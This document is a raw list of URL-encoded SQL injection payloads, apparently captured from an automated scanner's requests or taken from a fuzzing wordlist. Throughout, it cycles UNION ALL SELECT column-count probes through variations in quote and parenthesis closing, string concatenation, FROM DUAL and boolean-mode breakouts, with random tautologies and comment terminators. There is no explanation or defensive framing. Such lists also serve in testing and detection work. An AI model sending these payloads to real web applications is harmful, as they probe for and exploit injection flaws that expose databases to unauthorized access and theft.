1%27%20%7C%7C%20%28SELECT%201108%20WHERE%207628%3D7628%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207827%20WHERE%203265%3D3265%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204385%20WHERE%205241%3D5241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203973%20FROM%20DUAL%20WHERE%206047%3D6047%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207726%20FROM%20DUAL%20WHERE%203201%3D3201%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205888%20FROM%20DUAL%20WHERE%203264%3D3264%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204769%20FROM%20DUAL%20WHERE%206731%3D6731%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202076%20FROM%20DUAL%20WHERE%207619%3D7619%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206788%20FROM%20DUAL%20WHERE%205555%3D5555%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203655%20FROM%20DUAL%20WHERE%209729%3D9729%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207370%20FROM%20DUAL%20WHERE%201356%3D1356%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207174%20FROM%20DUAL%20WHERE%201092%3D1092%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208129%20FROM%20DUAL%20WHERE%208240%3D8240%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207594%20WHERE%201151%3D1151%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209381%20WHERE%209765%3D9765%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202874%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207343%20WHERE%209941%3D9941%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208514%20WHERE%205596%3D5596%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203223%20WHERE%203011%3D3011%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206095%20WHERE%202353%3D2353%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204944%20WHERE%209979%3D9979%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202964%20WHERE%203131%3D3131%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205001%20WHERE%209999%3D9999%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%27%20%2B%20%28SELECT%20%27tNGg%27%20FROM%20DUAL%20WHERE%204185%3D4185%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MAtG%27%20FROM%20DUAL%20WHERE%206366%3D6366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uyyq%27%20FROM%20DUAL%20WHERE%204389%3D4389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27zbnZ%27%20FROM%20DUAL%20WHERE%205309%3D5309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Wezl%27%20FROM%20DUAL%20WHERE%206000%3D6000%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bAdF%27%20FROM%20DUAL%20WHERE%202260%3D2260%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NBEs%27%20FROM%20DUAL%20WHERE%203056%3D3056%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DRyc%27%20FROM%20DUAL%20WHERE%209924%3D9924%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ctMu%27%20FROM%20DUAL%20WHERE%206068%3D6068%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Lseq%27%20FROM%20DUAL%20WHERE%208101%3D8101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NSuC%27%20WHERE%203986%3D3986%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Nvea%27%20WHERE%201803%3D1803%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NCvM%27%20WHERE%204151%3D4151%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MAdq%27%20WHERE%205182%3D5182%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bvZe%27%20WHERE%202407%3D2407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27noPZ%27%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27oNOz%27%20WHERE%206248%3D6248%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Iief%27%20WHERE%208300%3D8300%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ljHU%27%20WHERE%207116%3D7116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27xjoF%27%20WHERE%208606%3D8606%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -8109%29%20UNION%20ALL%20SELECT%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192--%20 -2489%29%20UNION%20ALL%20SELECT%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937--%20 -1028%29%20UNION%20ALL%20SELECT%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793%2C%207793--%20 -7433%29%20UNION%20ALL%20SELECT%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190%2C%201190--%20 -1735%29%20UNION%20ALL%20SELECT%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707--%20 -3174%29%20UNION%20ALL%20SELECT%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392%2C%202392--%20 -7342%29%20UNION%20ALL%20SELECT%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414%2C%201414--%20 -3718%29%20UNION%20ALL%20SELECT%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960%2C%205960--%20 -5360%29%20UNION%20ALL%20SELECT%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122%2C%201122--%20 -8482%29%20UNION%20ALL%20SELECT%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780%2C%203780--%20 -9752%27%29%20UNION%20ALL%20SELECT%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454%2C%201454--%20 -6302%27%29%20UNION%20ALL%20SELECT%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766%2C%202766--%20 -5584%27%29%20UNION%20ALL%20SELECT%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423--%20 -8395%27%29%20UNION%20ALL%20SELECT%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601--%20 -5523%27%29%20UNION%20ALL%20SELECT%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774%2C%207774--%20 -1077%27%29%20UNION%20ALL%20SELECT%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292%2C%208292--%20 -5625%27%29%20UNION%20ALL%20SELECT%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730--%20 -2150%27%29%20UNION%20ALL%20SELECT%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332%2C%203332--%20 -3469%27%29%20UNION%20ALL%20SELECT%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180%2C%203180--%20 -4664%27%29%20UNION%20ALL%20SELECT%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559%2C%209559--%20 -3474%27%20UNION%20ALL%20SELECT%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555--%20 -6955%27%20UNION%20ALL%20SELECT%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048%2C%204048--%20 -5238%27%20UNION%20ALL%20SELECT%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717--%20 -9454%27%20UNION%20ALL%20SELECT%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449--%20 -3759%27%20UNION%20ALL%20SELECT%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316--%20 -8356%27%20UNION%20ALL%20SELECT%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350--%20 -8045%27%20UNION%20ALL%20SELECT%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698%2C%205698--%20 -3441%27%20UNION%20ALL%20SELECT%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658%2C%205658--%20 -9873%27%20UNION%20ALL%20SELECT%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560--%20 -2161%27%20UNION%20ALL%20SELECT%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270%2C%202270--%20 -1152%22%20UNION%20ALL%20SELECT%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475%2C%206475--%20 -2433%22%20UNION%20ALL%20SELECT%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287%2C%205287--%20 -1877%22%20UNION%20ALL%20SELECT%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157%2C%203157--%20 -2518%22%20UNION%20ALL%20SELECT%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919%2C%207919--%20 -5741%22%20UNION%20ALL%20SELECT%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977%2C%207977--%20 -5847%22%20UNION%20ALL%20SELECT%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806--%20 -4463%22%20UNION%20ALL%20SELECT%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351--%20 -8391%22%20UNION%20ALL%20SELECT%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635%2C%207635--%20 -3582%22%20UNION%20ALL%20SELECT%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451--%20 -8380%22%20UNION%20ALL%20SELECT%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203%2C%208203--%20 -1302%29%20UNION%20ALL%20SELECT%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870%2C%201870--%20%20AND%20%281543%3D1543 -8471%29%20UNION%20ALL%20SELECT%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530%2C%204530--%20%20AND%20%283859%3D3859 -3179%29%20UNION%20ALL%20SELECT%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133--%20%20AND%20%286999%3D6999 